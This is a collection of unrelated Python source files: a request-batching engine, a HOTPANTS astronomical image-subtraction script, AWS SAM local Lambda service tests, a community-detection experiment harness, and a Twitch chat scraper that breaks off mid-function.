        self.barrier = td.Barrier(self.batch_max_size + 1)

        self.samples = {}  # sample_id -> kwargs awaiting processing
        self.results = {}  # sample_id -> result (or Exception) awaiting pickup
        td.Thread(target=self._batch_engine, daemon=True).start()

        self.sample_id_generator = itertools.count()

    def _batch_engine(self):
        # Runs forever on the daemon thread; one loop iteration == one batch.
        while True:
            # Don't start a new batch until all previous results were consumed.
            if len(self.results) > 0:
                time.sleep(0.001)
                continue

            try:
                self.barrier.wait(self.batch_interval_seconds)
            except td.BrokenBarrierError:
                # Timeout: process whatever samples arrived so far.
                pass

            self.results = {}
            sample_ids = self._get_sample_ids(self.batch_max_size)
            try:
                if self.samples:
                    batch = self._make_batch(sample_ids)

                    results = getattr(self.handler_impl, self.method_name)(**batch)
                    if not isinstance(results, list):
                        raise UserRuntimeException(
                            f"please return a list when using server side batching, got {type(results)}"
                        )

                    if self.test_mode:
                        self._test_batch_lengths.append(len(results))

                    self.results = dict(zip(sample_ids, results))
            except Exception as e:
                # Hand the exception itself back to every waiter in this batch.
                self.results = {sample_id: e for sample_id in sample_ids}
                logger.error(traceback.format_exc())
            finally:
                for sample_id in sample_ids:
                    del self.samples[sample_id]
                # Reset so the next batch of waiters starts from a clean barrier.
                self.barrier.reset()

    def _get_sample_ids(self, max_number: int) -> List[int]:
        # Oldest-first (ids are monotonically increasing), capped at max_number.
        if len(self.samples) <= max_number:
            return list(self.samples.keys())
        return sorted(self.samples)[:max_number]

    def _make_batch(self, sample_ids: List[int]) -> Dict[str, List[Any]]:
        # Transpose per-sample kwargs into kwargs-of-lists for the handler.
        batched_samples = defaultdict(list)
        for sample_id in sample_ids:
            for key, sample in self.samples[sample_id].items():
                batched_samples[key].append(sample)

        return dict(batched_samples)

    def _enqueue_request(self, sample_id: int, **kwargs):
        """
        Enqueue sample for batch processing. This is a blocking method.
        """
        self.samples[sample_id] = kwargs
        try:
            self.barrier.wait()
        except td.BrokenBarrierError:
            # Barrier was broken by the engine's timeout/reset; the sample is
            # already enqueued, so proceed to wait for the result.
            pass

    def process(self, **kwargs):
        """
        Queues a request to be batched with other incoming request, waits for the response
        and returns the processed result. This is a blocking method.
        """
        sample_id = next(self.sample_id_generator)
        self._enqueue_request(sample_id, **kwargs)
        result = self._get_result(sample_id)
        return result

    def _get_result(self, sample_id: int) -> Any:
        """
        Return the processed result. This is a blocking method.

        Exceptions raised by the handler are converted into a 500 plain-text
        Response rather than re-raised.
        """
        while sample_id not in self.results:
            time.sleep(0.001)
        result = self.results[sample_id]
        del self.results[sample_id]

        if isinstance(result, Exception):
            return Response(
                content=str(result),
                status_code=HTTPStatus.INTERNAL_SERVER_ERROR,
                media_type="text/plain",
            )

        return result
align+subt_ref2sci.py
#============================================================
# PYTHON SCRIPT FOR SUBTRACTION USING HOTPANTS
# Usage :
# OR JUST RUN AND WRITE INPUT & REF IMAGE
# 2019.07.05 GREGORY S.H. PAEK
#============================================================
import numpy as np
import os, sys, glob
from astropy.io import fits
import astropy.coordinates as coord
import astropy.units as u
from multiprocessing import Process, Pool
import multiprocessing as mp
import time
import alipy
#============================================================
def hotpants(imlist, refim, ngmode=False, insig=0, refsig=0):
    """Run the external ``hotpants`` binary to subtract refim from each image.

    Outputs 'hd<name>' (difference) and 'hc<name>' (convolved) next to each
    input. With ngmode=True, Gaussian kernel widths are derived from the
    image/reference seeing sigmas (insig, refsig).
    """
    if not isinstance(imlist, list):
        imlist = [imlist]
    starttime = time.time()
    for inim in imlist:
        outfile = os.path.dirname(inim)+'/hd'+os.path.basename(inim)
        convfile = os.path.dirname(inim)+'/hc'+os.path.basename(inim)
        if ngmode == False:
            com = 'hotpants -c t -n i -iu 60000 -tu 60000 -tl -10000 -v 0 -inim '+inim+' -tmplim '+refim+' -outim '+outfile+' -oci '+convfile
        elif ngmode == True:
            # Kernel sigma matched to sqrt(insig^2 - refsig^2);
            # NOTE(review): assumes insig >= refsig, otherwise this is NaN.
            sigmatch = np.sqrt(insig**2-refsig**2)
            com = 'hotpants -c t -n i -iu 60000 -tu 60000 -tl -10000 -v 0 -inim {0} -tmplim {1} -outim {2} -oci {3} -ng 3 6 {4} 4 {5} 2 {6}'.format(inim, refim, outfile, convfile, 0.5*sigmatch, sigmatch, 2.0*sigmatch)
        os.system(com)
    deltime = time.time() - starttime
    print('All PROCESS IS DONE.\t('+str(round(deltime, 1))+' sec)')
#-------------------------------------------------------------
def gregistering(images_to_align, ref_image):
    """Align images onto ref_image's pixel grid with alipy + IRAF.

    Writes '<name>_gregister.fits' files via alipy.align.irafalign.
    If ref_image is '', the first input image is used as the reference.
    """
    starttime = time.time()
    if not isinstance(images_to_align, list):
        images_to_align = [images_to_align]
    if ref_image == '':
        ref_image = images_to_align[0]
    identifications = alipy.ident.run(ref_image, images_to_align, visu=False)
    # FIX: Python 2 print statements converted to print() calls so the script
    # runs on Python 3 (output is unchanged).
    for id in identifications:  # list of the same length as images_to_align.
        if id.ok == True:       # i.e., if it worked
            print("%20s : %20s, flux ratio %.2f" % (id.ukn.name, id.trans, id.medfluxratio))
        else:
            print("%20s : no transformation found !" % (id.ukn.name))
    outputshape = alipy.align.shape(ref_image)
    for id in identifications:
        if id.ok == True:
            params_align = dict(
                filepath=id.ukn.filepath,
                uknstarlist=id.uknmatchstars,
                refstarlist=id.refmatchstars,
                shape=alipy.align.shape(ref_image),
                outdir='./',
                makepng=False)
            alipy.align.irafalign(**params_align)
    deltime = time.time() - starttime
    print('All PROCESS IS DONE.\t('+str(round(deltime, 1))+' sec)')
#-------------------------------------------------------------
def subt_routine(inim, refim, ngmode=False, insig=0, refsig=0):
    """Register the reference onto inim's grid, then hotpants-subtract it."""
    #time.sleep(5)
    grefim = inim[:-5]+'_ref2sci.fits'
    gregistering(refim, inim)
    os.system('mv {0} {1}'.format(refim[:-5]+'_gregister.fits', grefim))
    hotpants(inim, grefim, ngmode, insig, refsig)
#============================================================
path_base = '.'
refim = path_base+'/ref.fits'
imlist = glob.glob(path_base+'/Calib-*0.fits')
imlist.sort()
#------------------------------------------------------------
for inim in imlist:
    # Seeing (FWHM) to Gaussian sigma: divide by 2.355.
    insig = fits.getheader(inim)['seeing']/2.355
    refsig = fits.getheader(refim)['seeing']/2.355
    subt_routine(inim, refim, ngmode=False, insig=insig, refsig=refsig)
#------------------------------------------------------------
# MULTI PROCESSING
#------------------------------------------------------------
'''
for inim in imlist:
    if __name__ == '__main__':
        jobs = []
        p = mp.Process(target=subt_routine, args=(inim, refim))
        jobs.append(p)
        p.start()
        p.join()

if __name__ == '__main__':
    procs = []
    for inim in imlist:
        proc = mp.Process(target=subt_routine, args=(inim, refim, ))
        procs.append(proc)
        proc.start()
    for proc in procs:
        proc.join()
'''
test_local_lambda_invoke.py
"""Functional tests for the local Lambda invoke service.

FIX: ``assertEquals`` (a deprecated alias removed in Python 3.12) is replaced
with ``assertEqual`` throughout, and deprecated ``Thread.setDaemon(True)``
calls are replaced with the ``daemon`` attribute.
"""
import threading
import shutil
import random
from mock import Mock
import time
from unittest import TestCase
import os

import requests

from samcli.local.lambda_service.local_lambda_invoke_service import LocalLambdaInvokeService
from tests.functional.function_code import nodejs_lambda, HELLO_FROM_LAMBDA, ECHO_CODE, THROW_ERROR_LAMBDA
from samcli.commands.local.lib import provider
from samcli.local.lambdafn.runtime import LambdaRuntime
from samcli.commands.local.lib.local_lambda import LocalLambdaRunner
from samcli.local.docker.manager import ContainerManager
from samcli.local.lambdafn.exceptions import FunctionNotFound
from samcli.local.layers.layer_downloader import LayerDownloader
from samcli.local.docker.lambda_image import LambdaImage


class TestLocalLambdaService(TestCase):
    """Happy-path and error-path invocations against a live local service."""

    @classmethod
    def mocked_function_provider(cls, function_name):
        # Stand-in for the function provider: two known functions, anything
        # else raises FunctionNotFound like the real provider would.
        if function_name == "HelloWorld":
            return cls.hello_world_function
        elif function_name == "ThrowError":
            return cls.throw_error_function
        else:
            raise FunctionNotFound("Could not find Function")

    @classmethod
    def setUpClass(cls):
        cls.code_abs_path_for_throw_error = nodejs_lambda(THROW_ERROR_LAMBDA)

        # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
        cls.cwd_for_throw_error = os.path.dirname(cls.code_abs_path_for_throw_error)
        cls.code_uri_for_throw_error = os.path.relpath(
            cls.code_abs_path_for_throw_error, cls.cwd_for_throw_error)  # Get relative path with respect to CWD

        cls.code_abs_path = nodejs_lambda(HELLO_FROM_LAMBDA)

        # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
        cls.cwd = os.path.dirname(cls.code_abs_path)
        cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd)  # Get relative path with respect to CWD

        cls.hello_world_function_name = "HelloWorld"

        cls.hello_world_function = provider.Function(name=cls.hello_world_function_name, runtime="nodejs4.3",
                                                     memory=256, timeout=5, handler="index.handler",
                                                     codeuri=cls.code_uri, environment=None, rolearn=None, layers=[])

        cls.throw_error_function_name = "ThrowError"

        cls.throw_error_function = provider.Function(name=cls.throw_error_function_name, runtime="nodejs4.3",
                                                     memory=256, timeout=5, handler="index.handler",
                                                     codeuri=cls.code_uri_for_throw_error, environment=None,
                                                     rolearn=None, layers=[])

        cls.mock_function_provider = Mock()
        cls.mock_function_provider.get.side_effect = cls.mocked_function_provider

        cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd)
        cls.service.create()
        # Run the service on a daemon thread so it dies with the test process.
        t = threading.Thread(name='thread', target=cls.service.run, args=())
        t.daemon = True
        t.start()
        time.sleep(1)  # give the service time to bind before tests fire requests

    @classmethod
    def tearDownClass(cls):
        shutil.rmtree(cls.code_abs_path)
        shutil.rmtree(cls.code_abs_path_for_throw_error)

    def setUp(self):
        # Print full diff when comparing large dictionaries
        self.maxDiff = None

    def test_lambda_str_response_is_returned(self):
        expected = 'Hello from Lambda'

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations')

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 200)

    def test_request_with_non_existing_function(self):
        expected_data = {"Message": "Function not found: arn:aws:lambda:us-west-2:012345678901:function:{}".format(
            'IDoNotExist'), "Type": "User"}

        response = requests.post(self.url + '/2015-03-31/functions/IDoNotExist/invocations')

        actual_data = response.json()
        actual_error_type_header = response.headers.get('x-amzn-errortype')

        self.assertEqual(actual_data, expected_data)
        self.assertEqual(actual_error_type_header, 'ResourceNotFound')
        self.assertEqual(response.status_code, 404)

    def test_request_a_function_that_throws_an_error(self):
        expected_data = {'errorMessage': 'something is wrong',
                         'errorType': 'Error',
                         'stackTrace': ['exports.handler (/var/task/index.js:3:17)']}

        response = requests.post(self.url + '/2015-03-31/functions/ThrowError/invocations')

        actual_data = response.json()
        actual_error_type_header = response.headers.get('x-amz-function-error')

        self.assertEqual(actual_data, expected_data)
        self.assertEqual(actual_error_type_header, 'Unhandled')
        self.assertEqual(response.status_code, 200)


class TestLocalEchoLambdaService(TestCase):
    """Invocations against an echo function: request payload comes back."""

    @classmethod
    def setUpClass(cls):
        cls.code_abs_path = nodejs_lambda(ECHO_CODE)

        # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
        cls.cwd = os.path.dirname(cls.code_abs_path)
        cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd)  # Get relative path with respect to CWD

        cls.function_name = "HelloWorld"

        cls.function = provider.Function(name=cls.function_name, runtime="nodejs4.3", memory=256, timeout=5,
                                         handler="index.handler", codeuri=cls.code_uri, environment=None,
                                         rolearn=None, layers=[])

        cls.mock_function_provider = Mock()
        cls.mock_function_provider.get.return_value = cls.function

        cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd)
        cls.service.create()
        t = threading.Thread(name='thread', target=cls.service.run, args=())
        t.daemon = True
        t.start()
        time.sleep(1)

    @classmethod
    def tearDownClass(cls):
        shutil.rmtree(cls.code_abs_path)

    def setUp(self):
        # Print full diff when comparing large dictionaries
        self.maxDiff = None

    def test_mock_response_is_returned(self):
        expected = {"key1": "value1"}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 200)

    def test_binary_octet_stream_format(self):
        expected = {"key1": "value1"}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"},
                                 headers={"Content-Type": "binary/octet-stream"})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 200)

    def test_function_executed_when_no_data_provided(self):
        expected = {}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations')

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 200)


class TestLocalLambdaService_NotSupportedRequests(TestCase):
    """Requests using features the local service deliberately rejects."""

    @classmethod
    def setUpClass(cls):
        cls.code_abs_path = nodejs_lambda(ECHO_CODE)

        # Let's convert this absolute path to relative path. Let the parent be the CWD, and codeuri be the folder
        cls.cwd = os.path.dirname(cls.code_abs_path)
        cls.code_uri = os.path.relpath(cls.code_abs_path, cls.cwd)  # Get relative path with respect to CWD

        cls.function_name = "HelloWorld"

        cls.function = provider.Function(name=cls.function_name, runtime="nodejs4.3", memory=256, timeout=5,
                                         handler="index.handler", codeuri=cls.code_uri, environment=None,
                                         rolearn=None, layers=[])

        cls.mock_function_provider = Mock()
        cls.mock_function_provider.get.return_value = cls.function

        cls.service, cls.port, cls.url, cls.scheme = make_service(cls.mock_function_provider, cls.cwd)
        cls.service.create()
        t = threading.Thread(name='thread', target=cls.service.run, args=())
        t.daemon = True
        t.start()
        time.sleep(1)

    @classmethod
    def tearDownClass(cls):
        shutil.rmtree(cls.code_abs_path)

    def setUp(self):
        # Print full diff when comparing large dictionaries
        self.maxDiff = None

    def test_query_string_parameters_in_request(self):
        expected = {"Type": "User", "Message": "Query Parameters are not supported"}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', json={"key1": "value1"},
                                 params={"key": "value"})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 400)
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'InvalidRequestContent')
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')

    def test_payload_is_not_json_serializable(self):
        expected = {"Type": "User", "Message": "Could not parse request body into json: No JSON object could be decoded"}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations', data='notat:asdfasdf')

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 400)
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'InvalidRequestContent')
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')

    def test_log_type_tail_in_request(self):
        expected = {"Type": "LocalService", "Message": "log-type: Tail is not supported. None is only supported."}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations',
                                 headers={'X-Amz-Log-Type': 'Tail'})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 501)
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'NotImplemented')

    def test_log_type_tail_in_request_with_lowercase_header(self):
        expected = {"Type": "LocalService", "Message": "log-type: Tail is not supported. None is only supported."}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations',
                                 headers={'x-amz-log-type': 'Tail'})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 501)
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'NotImplemented')

    def test_invocation_type_event_in_request(self):
        expected = {"Type": "LocalService",
                    "Message": "invocation-type: Event is not supported. RequestResponse is only supported."}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations',
                                 headers={'X-Amz-Invocation-Type': 'Event'})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 501)
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'NotImplemented')

    def test_invocation_type_dry_run_in_request(self):
        expected = {"Type": "LocalService",
                    "Message": "invocation-type: DryRun is not supported. RequestResponse is only supported."}

        response = requests.post(self.url + '/2015-03-31/functions/HelloWorld/invocations',
                                 headers={'X-Amz-Invocation-Type': 'DryRun'})

        actual = response.json()

        self.assertEqual(actual, expected)
        self.assertEqual(response.status_code, 501)
        self.assertEqual(response.headers.get('Content-Type'), 'application/json')
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'NotImplemented')

    def test_generic_404_error_when_request_to_nonexisting_endpoint(self):
        expected_data = {'Type': 'LocalService', 'Message': 'PathNotFoundException'}

        response = requests.post(self.url + '/some/random/path/that/does/not/exist')

        actual_data = response.json()

        self.assertEqual(actual_data, expected_data)
        self.assertEqual(response.status_code, 404)
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'PathNotFoundLocally')

    def test_generic_405_error_when_request_path_with_invalid_method(self):
        expected_data = {'Type': 'LocalService', 'Message': 'MethodNotAllowedException'}

        response = requests.get(self.url + '/2015-03-31/functions/HelloWorld/invocations')

        actual_data = response.json()

        self.assertEqual(actual_data, expected_data)
        self.assertEqual(response.status_code, 405)
        self.assertEqual(response.headers.get('x-amzn-errortype'), 'MethodNotAllowedLocally')


def make_service(function_provider, cwd):
    """Build a LocalLambdaInvokeService on a random port; return (service, port, url, scheme)."""
    port = random_port()
    manager = ContainerManager()
    layer_downloader = LayerDownloader("./", "./")
    image_builder = LambdaImage(layer_downloader, False)
    local_runtime = LambdaRuntime(manager, image_builder)
    lambda_runner = LocalLambdaRunner(local_runtime=local_runtime,
                                      function_provider=function_provider,
                                      cwd=cwd)

    service = LocalLambdaInvokeService(lambda_runner, port=port, host='127.0.0.1')

    scheme = "http"
    url = '{}://127.0.0.1:{}'.format(scheme, port)
    return service, port, url, scheme


def random_port():
    # Ephemeral-ish range to avoid clashing with common fixed ports.
    return random.randint(30000, 40000)
experiments.py
import matplotlib.pyplot as plt


def _get_return(function, x, y, return_var):
    # Helper for running an algorithm in a subprocess: appends the call's
    # result to a shared list (see the commented-out multiprocessing code in
    # run_all_algos below).
    return_var.append(function(x, elapsed_time=y))


from tnetwork.DCD.analytics.dynamic_partition import *
from sklearn.metrics import adjusted_rand_score,f1_score
import pandas as pd
import os
import numpy as np
import pickle

# def standard_methods_to_test():
#     eng = engine.start_matlab()
#
#     def smoothed_louvain(x, elapsed_time=True):
#         return tn.DCD.iterative_match(x, CDalgo="smoothedLouvain", elapsed_time=elapsed_time)
#
#     # methods_to_test = {"iterative":DCD.iterative_match,"dynamo":dynamo,"dynmoga":dynmoga,"smoothed_louvain":smoothed_louvain}
#
#     def mucha_opti(x, elapsed_time=True):
#         return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng)
#
#     def mucha_global(x, elapsed_time=True):
#         return transversal_network_mucha_original(x, elapsed_time=elapsed_time, matlab_session=eng, form="global")
#
#     print("pas de mucha")
#     methods_to_test = {"iterative": tn.DCD.iterative_match,
#                        "dynamo": dynamo,
#                        "smoothed_louvain": smoothed_louvain,
#                        "mucha": mucha_opti,
#                        "mucha_global":mucha_global,
#                        "survival_graph": tn.DCD.match_survival_graph}  # ,"dynmoga":dynmoga}#
#
#     # methods_to_test = {"smoothed_louvain":smoothed_louvain}#,"dynmoga":dynmoga}#
#     return methods_to_test


def compute_all_stats(all_infos, detailed=True):
    """
    Compute evaluation statistics for a set of dynamic-community-detection runs.

    :param all_infos: dict mapping an experiment id to a dict with keys "GT"
        (ground-truth communities), "graph" (dynamic graph), "ID" (dict of
        experiment parameters) and optionally "result" (dict mapping algorithm
        name to a (communities, timings) pair).
    :param detailed: if True, also compute the expensive similarity/smoothness
        scores (LAMI, LARI, SM-*, Q, AMI, ARI); otherwise only names, running
        times and sizes.
    :return: a pandas DataFrame with one row per (experiment, algorithm).
    """
    names = []
    times = []
    LAMI = []
    LARI = []
    #LNMI = []
    #LF1 = []
    nb_changes = []
    # entropies = []
    ent_by_nodes = []
    S = []
    modularities = []
    nmis = []
    ARIs = []
    #F1s = []
    nb_nodes = []
    nb_steps = []
    IDs = {}
    for id,an_experiment in all_infos.items():
        GT_as_sn = an_experiment["GT"]
        dyn_graph_sn=an_experiment["graph"]
        if "result" not in an_experiment:
            results={}
        else:
            results = an_experiment["result"]
        iteration = an_experiment["ID"]
        print(id)
        # NOTE(review): the loop variable `time` shadows the `time` module
        # inside this loop body (it is the per-algorithm timing dict here).
        for name, (result, time) in results.items():
            print(name)
            for k, v in iteration.items():
                IDs.setdefault(k,[])
                IDs[k].append(v)
            names.append(name)
            times.append(time["total"])
            nb_steps.append(len(dyn_graph_sn.snapshots()))
            nb_nodes.append(len(dyn_graph_sn.snapshots(dyn_graph_sn.snapshots_timesteps()[0]).nodes))
            if detailed:
                LAMI.append(longitudinal_similarity(GT_as_sn, result))
                # def nf1go(x, y):
                #     a = NF1(y, x)
                #     score = a.get_f1()[0]
                #     return score
                #LF1.append(longitudinal_similarity(GT_as_sn,result,score=f1_score(),convert_coms_sklearn_format=False))
                #LAMI.append(longitudinal_similarity(GT_as_sn, result))
                LARI.append(longitudinal_similarity(GT_as_sn, result, score=adjusted_rand_score))
                nb_changes.append(nb_node_change(result))
                consecutive_NMIs = consecutive_sn_similarity(result)
                #entropies.append(entropy(result))
                ent_by_nodes.append(entropy_by_node(result))  #####Slow
                S.append(np.average(consecutive_NMIs[0], weights=consecutive_NMIs[1]))
                mods = quality_at_each_step(result, dyn_graph_sn)
                modularities.append(np.average(mods[0], weights=mods[1]))
                sim = similarity_at_each_step(GT_as_sn,result)
                nmis.append(np.average(sim[0],weights=sim[1]))
                rand = similarity_at_each_step(GT_as_sn,result,score=adjusted_rand_score)
                ARIs.append(np.average(rand[0],weights=rand[1]))
                #sim = similarity_at_each_step(GT_as_sn,result,score=f1_score())
                #F1s.append(np.average(sim[0],weights=sim[1]))
    # Assemble the per-run statistics into one DataFrame.
    df = pd.DataFrame()
    df["algorithm"] = names
    df["running time"] = times
    print(names)
    if detailed:
        print(LAMI)
        df["LAMI"] = LAMI
        #df["LF1"] = LF1
        #df["LNMI"] = LNMI
        df["LARI"] = LARI
        df["SM-N"] = nb_changes
        #df["I_old"] = entropies
        df["SM-L"] = ent_by_nodes
        df["SM-P"] = S
        df["Q"] = modularities
        df["AMI"] = nmis
        df["ARI"] = ARIs
        #df["F1"] = F1s
    df["# nodes"] = nb_nodes
    df["# steps"] = nb_steps
    # One column per experiment parameter (seed, size, ...).
    for k,l in IDs.items():
        df[k]=l
    return df


def run_all_algos(methods_to_test, dyn_graph_sn, plot=False, waiting=120):
    """
    Run every community-detection method on the given dynamic graph.

    :param methods_to_test: dict mapping a method name to a callable taking
        (dyn_graph, elapsed_time=True).
    :param dyn_graph_sn: the dynamic graph (snapshot representation).
    :param plot: False, or a directory path; when a path is given, a
        longitudinal plot per method and a pickle of all results are written
        there.
    :param waiting: timeout in seconds (only used by the commented-out
        multiprocessing variant below).
    :return: dict mapping method name to that method's (result, timing) output.
    """
    results = {}
    methods_this_step = {name: m for name, m in methods_to_test.items()}
    for name, m in methods_this_step.items():
        results[name] = m(dyn_graph_sn, elapsed_time=True)
        # manager = multiprocessing.Manager()
        # temp = manager.list()
        # p = multiprocessing.Process(target=_get_return, args=(m,dyn_graph_sn,True,temp))
        # p.start()
        # p.join(waiting)
        # if p.is_alive():
        #     print ("running... let's kill it...")
        #     del methods_to_test[name]  # Terminate
        #     p.terminate()
        #     p.join()
        # else:
        #     results[name] = temp[0]
        if plot!=False:
            #dyn_graph = dyn_graph_sn.to_DynGraphIG(sn_duration=1)
            p = tn.plot_longitudinal(dyn_graph_sn, results[name][0])#.to_DynCommunitiesIG(1))
            location = os.path.join(plot,name+".png")
            p.savefig(location, bbox_inches='tight')
            plt.clf()
    if plot:
        pickle.dump(results,open(os.path.join(plot,"result.pickle"),"wb"))
    return results


def subset(graph, com, length):
    # Return the first `length` snapshots of `graph` together with the
    # ground-truth communities restricted to those snapshots.
    subgraph = tn.DynGraphSN(list(graph.snapshots().values())[:length])
    subcomsGT = tn.DynCommunitiesSN()
    for t in subgraph.snapshots_timesteps():
        subcomsGT.set_communities(t, com.snapshot_communities(t))
    return (subgraph, subcomsGT)
ChatBot.py
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options
from selenium.webdriver.common.keys import Keys
import pickle
from datetime import datetime
from datetime import timedelta
import time
import pathlib
import os
import math
from colorama import init
from threading import Thread

init()  # enable ANSI colour codes on Windows consoles


class ChatBot:
    """Scrapes a Twitch channel's popout chat with a headless Firefox.

    Drives the popout chat page (with the BetterTTV addon installed) and
    periodically harvests new and deleted messages from the DOM, tagging
    already-processed elements by rewriting their CSS class via injected JS.
    """

    # Class-level defaults; NOTE(review): stored_msgs is a mutable class
    # attribute shared by all instances until an instance reassigns it —
    # list_chat() does reassign (`self.stored_msgs = ...[-100:]`), but early
    # appends before the first reassignment mutate the shared list.
    browser = None
    channel = ''
    error = 0
    isReady = 0
    refreshHour = None
    isClosed = 0
    callback_error = None
    chat_message_callback = None
    stored_msgs = []
    avg_delay = 0
    mps = 0
    automatic_list = True

    def auto_list(self):
        """Poll chat + deletions forever, re-spawning itself on a new thread.

        NOTE(review): never checks self.isClosed, so polling continues (and
        errors) after close() — presumably unintended; confirm before fixing.
        """
        self.list_chat()
        self.list_deleted()
        time.sleep(0.1)
        Thread(target=self.auto_list).start()

    def empty_callback_error(self, function, channel, msg, info = ''):
        # Default error sink when no callback_error was injected.
        # NOTE(review): `channel` parameter is accepted but not printed.
        print(function, msg, info)

    def __init__(self, channel, chat_message_callback = None):
        """Store the target channel; the browser is only started by start()."""
        try:
            self.channel = channel.strip()
            self.chat_message_callback = chat_message_callback
        except Exception as e:
            self.error = 1
            # NOTE(review): callback_error may still be None here (it is only
            # defaulted in start()), so this line itself can raise.
            self.callback_error('ChatBot.py > __init__()', self.channel, str(e), '')

    def start(self):
        """Launch headless Firefox, install BetterTTV and open the popout chat."""
        try:
            print('\x1b[2;30;46m' + 'Iniciando: ' + self.channel + '\x1b[0m')
            if self.callback_error == None:
                self.callback_error = self.empty_callback_error
            options = Options()
            options.add_argument("--start-minimized")
            options.add_argument('--headless')
            options.add_argument('--disable-gpu')
            self.browser = webdriver.Firefox(options=options)
            # BetterTTV xpi is expected to live next to this file.
            self.browser.install_addon(os.path.join(pathlib.Path(__file__).parent.resolve(), 'betterttv-7.4.25-fx.xpi'))
            url = 'https://www.twitch.tv/popout/' + self.channel + '/chat?popout='
            self.browser.get(url.lower())
            # Schedule a page refresh one hour from now (done in list_chat()).
            self.refreshHour = datetime.now() + timedelta(minutes=60)
            self.isReady = 1
            print('Configuração concluída')
            if self.automatic_list:
                self.auto_list()
        except Exception as e:
            self.error = 1
            self.callback_error('ChatBot.py > start()', self.channel, str(e), '')

    def close(self):
        """Flag the bot closed and tear the browser down."""
        try:
            self.isClosed = 1
            self.browser.close()
            self.browser.quit()
            del self.browser
            try:
                # NOTE(review): `del self` only unbinds the local name — it does
                # not destroy the instance; effectively a no-op kept as-is.
                del self
            except Exception as e:
                print('del self - ' + self.channel + ' ' + str(e))
        except Exception as e:
            self.callback_error('ChatBot.py > close()', self.channel, str(e), '')

    def list_deleted(self):
        """Return ids of previously-captured messages now marked deleted.

        Scans elements this class earlier re-classed as 'captured'; when the
        moderator-deletion notice text matches, records the element id and
        re-classes the element to 'del' so it is not reported again.
        """
        msgs = []
        try:
            if len(self.browser.find_elements(By.CLASS_NAME, 'chat-line__message--deleted-notice')) > 0:
                chatElements = self.browser.find_elements(By.CLASS_NAME, 'captured')
                for chatElement in chatElements:
                    if (chatElement != []):
                        message = ""
                        for chatText in chatElement.find_elements(By.CLASS_NAME, 'chat-line__message--deleted-notice'):
                            message += chatText.text
                            # Strip the notice class so this fragment is not
                            # counted again on the next poll.
                            self.browser.execute_script(
                                "var element = arguments[0];" +
                                "if (element.className.includes('chat-line__message--deleted-notice'))" +
                                "{element.setAttribute('class','');}", chatText)
                        # Exact pt-BR notice text emitted by Twitch; do not translate.
                        if (message == 'message excluída por um moderador.'):
                            msgs.append(chatElement.get_attribute("id"))
                            self.browser.execute_script(
                                "var element = arguments[0];" +
                                "if (element.className === 'captured')" +
                                "{element.setAttribute('class','del');}", chatElement)
        except Exception as e:
            self.callback_error('ChatBot.py > listDeleted()', self.channel, str(e), '')
        return msgs

    def calc_duration(function):
        # Decorator applied at class-body time (not an instance method):
        # stamps the wrapped call's duration in ms into result['delay'].
        def wrapper(*args, **kwargs):
            start_time = time.time()
            result = function(*args, **kwargs)
            result['delay'] = int((time.time() - start_time) * 1000)
            return result
        return wrapper

    @calc_duration
    def process_messges(self, chatElement):
        # NOTE(review): "messges" is a typo but is the public name — renaming
        # would break callers; kept as-is.
        """Extract one chat message (user, text, emotes, badges) from a DOM node
        and mark the node as captured. Returns the message dict."""
        chatMsg = {
            "id": "",
            "channel": "",
            "user": "",
            "message": "",
            "badges": [],
            "emotes": [],
            "datetime": "",
            "color": ""
        }
        try:
            chatMsg['channel'] = self.channel
            chatMsg['datetime'] = datetime.now()
            # Synthesise a compact hex id from the capture timestamp.
            chatMsg['id'] = hex(int(chatMsg['datetime'].strftime("%Y%m%d%H%M%S%f")) - 20000000000000000000).replace('0x', '')
        except Exception as e:
            self.callback_error('ChatBot.py > process_messges() > configurando', self.channel, str(e),
                                str(chatElement.get_attribute('innerHTML')))
        try:
            for chatUser in chatElement.find_elements(By.CLASS_NAME, 'chat-author__display-name'):
                chatMsg['user'] = chatUser.text
                chatMsg['color'] = chatUser.get_attribute("style")
        except Exception as e:
